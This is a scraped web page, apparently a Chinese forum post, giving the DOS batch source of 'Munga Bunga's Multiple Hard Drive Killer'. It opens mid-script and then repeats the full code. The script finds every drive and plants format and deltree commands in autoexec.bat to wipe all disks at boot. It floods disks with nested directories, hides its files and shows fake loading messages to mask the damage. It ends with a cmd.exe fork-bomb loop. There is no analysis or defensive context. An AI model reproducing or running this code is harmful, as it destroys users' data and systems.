echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) call deltree /y %%%%a: nul c:autoexec.bat

echo cd c:autoexec.bat

echo cls c:autoexec.bat

echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0. c:autoexec.bat

echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . c:autoexec.bat

echo echo 1. To make people aware that security should not be taken for granted. c:autoexec.bat

echo echo 2. Love is important, if you have it, truly, don't let go of it like I did! c:autoexec.bat

echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead. c:autoexec.bat

echo echo 4. Don't support the following: War, Racism, Drugs and the Liberal Party.c:autoexec.bat

echo echo. c:autoexec.bat

echo echo Regards, c:autoexec.bat

echo echo. c:autoexec.bat

echo echo Munga Bunga c:autoexec.bat

call attrib +r +h c:autoexec.bat

:makedir

if exist c:temp.bat attrib -r -h c:temp.bat nul

echo @echo off c:temp.bat

echo %%1: c:temp.bat

echo cd c:temp.bat

echo :startmd c:temp.bat

echo for %%%%a in ("if not exist %%2nul md %%2" "if exist %%2nul cd %%2") do %%%%a c:temp.bat

echo for %%%%a in ("ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! c:temp.bat

echo if not exist %%1:%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2nul goto startmd c:temp.bat

call attrib +r +h c:temp.bat nul

cls

echo Initializing Variables . . .

rem deltree /y %%a:*. only eliminates directories, hence leaving the file created above for further destruction.

for %%a in (%drive%) do call format %%a: /q /u /autoSample nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

for %%a in (%drive%) do call c:temp.bat %%a Munga nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

for %%a in (%drive%) call attrib -r -h %%a: /S nul

call attrib +r +h c:temp.bat nul

call attrib +r +h c:autoexec.bat nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

echo Initializing Application . . .

for %%a in (%drive%) call deltree /y %%a:*. nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

echo Initializing Application . . .

echo Starting Application . . .

for %%a in (%drive%) do call c:temp.bat %%a Munga nul

cls

echo Thank you for using a Munga Bunga product.

echo.

echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.

echo.

echo Here is a joke for you . . .

echo.

echo Q). What's the worst thing about being an egg?

echo A). You only get laid once.

echo.

echo HAHAHAHA, get it? Don't you just love that one?

echo.

echo Regards,

echo.

echo Munga Bunga

变异病毒源代码:@echo off

rem This program is dedecated to a very special person that does not want to be named.

:start

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

call attrib -r -h c:autoexec.bat nul

echo @echo off c:autoexec.bat

echo call format c: /q /u /autoSample nul c:autoexec.bat

call attrib +r +h c:autoexec.bat nul

rem Drive checking and assigning the valid drives to the drive variable.

set drive=

set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z

rem code insertion for Drive Checking takes place here.

rem drivechk.bat is the file name under the root directory.

rem As far as the drive detection and drive variable settings, don't worry about how it

rem works, it's d*amn to complicated for the average or even the expert batch programmer.

rem Except for Tom Lavedas.

echo @echo off drivechk.bat

echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" nul {t}.bat

%comspec% /e:2048 /c {t}.bat drivechk.bat

del {t}.bat

echo if errorlevel 1 goto enddc drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem When errorlevel is 1, then the above is not true, if 0, then it's true.

rem Opposite of binary rules. If 0, it will elaps to the next command.

echo @prompt %%%%comspec%%%% /f /c dir %%%%1:./ad/w/-p $b find "bytes" nul {t}.bat

%comspec% /e:2048 /c {t}.bat drivechk.bat

del {t}.bat

echo if errorlevel 1 goto enddc drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.

rem if errorlevel is 0, then it will elaps to the next command.

echo @prompt dir %%%%1:./ad/w/-p $b find " 0 bytes free" nul {t}.bat

%comspec% /e:2048 /c {t}.bat drivechk.bat

del {t}.bat

echo if errorlevel 1 set drive=%%drive%% %%1 drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.

rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.

echo :enddc drivechk.bat

rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".

rem Now we will use the program drivechk.bat to attain valid drive information.

:Sampledrv

for %%a in (%alldrive%) do call drivechk.bat %%a nul

del drivechk.bat nul

if %drive.==. set drive=c

:form_del

call attrib -r -h c:autoexec.bat nul

echo @echo off c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) call deltree /y %%%%a: nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga nul c:autoexec.bat

echo cls c:autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . c:autoexec.bat

echo for %%%%a in (%drive%) call deltree /y %%%%a: nul c:autoexec.bat

echo cd c:autoexec.bat

echo cls c:autoexec.bat

echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0. c:autoexec.bat

echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . c:autoexec.bat

echo echo 1. To make people aware that security should not be taken for granted. c:autoexec.bat

echo echo 2. Love is important, if you have it, truly, don't let go of it like I did! c:autoexec.bat

echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead. c:autoexec.bat

echo echo 4. Don't support the following: War, Racism, Drugs and the Liberal Party.c:autoexec.bat

echo echo. c:autoexec.bat

echo echo Regards, c:autoexec.bat

echo echo. c:autoexec.bat

echo echo Munga Bunga c:autoexec.bat

call attrib +r +h c:autoexec.bat

:makedir

if exist c:temp.bat attrib -r -h c:temp.bat nul

echo @echo off c:temp.bat

echo %%1: c:temp.bat

echo cd c:temp.bat

echo :startmd c:temp.bat

echo for %%%%a in ("if not exist %%2nul md %%2" "if exist %%2nul cd %%2") do %%%%a c:temp.bat

echo for %%%%a in ("ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! c:temp.bat

echo if not exist %%1:%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2nul goto startmd c:temp.bat

call attrib +r +h c:temp.bat nul

cls

echo Initializing Variables . . .

rem deltree /y %%a:*. only eliminates directories, hence leaving the file created above for further destruction.

for %%a in (%drive%) do call format %%a: /q /u /autoSample nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

for %%a in (%drive%) do call c:temp.bat %%a Munga nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

for %%a in (%drive%) call attrib -r -h %%a: /S nul

call attrib +r +h c:temp.bat nul

call attrib +r +h c:autoexec.bat nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

echo Initializing Application . . .

for %%a in (%drive%) call deltree /y %%a:*. nul

cls

echo Initializing Variables . . .

echo Validating Data . . .

echo Analyzing System Structure . . .

echo Initializing Application . . .

echo Starting Application . . .

for %%a in (%drive%) do call c:temp.bat %%a Munga nul

cls

echo Thank you for using a Munga Bunga product.

echo.

echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.

echo.

echo Here is a joke for you . . .

echo.

echo Q). What's the worst thing about being an egg?

echo A). You only get laid once.

echo.

echo HAHAHAHA, get it? Don't you just love that one?

echo.

echo Regards,

echo.

echo Munga Bunga

echo You got it!!

:a

start cmd.exe

start %0

goto a

0条大神的评论

发表评论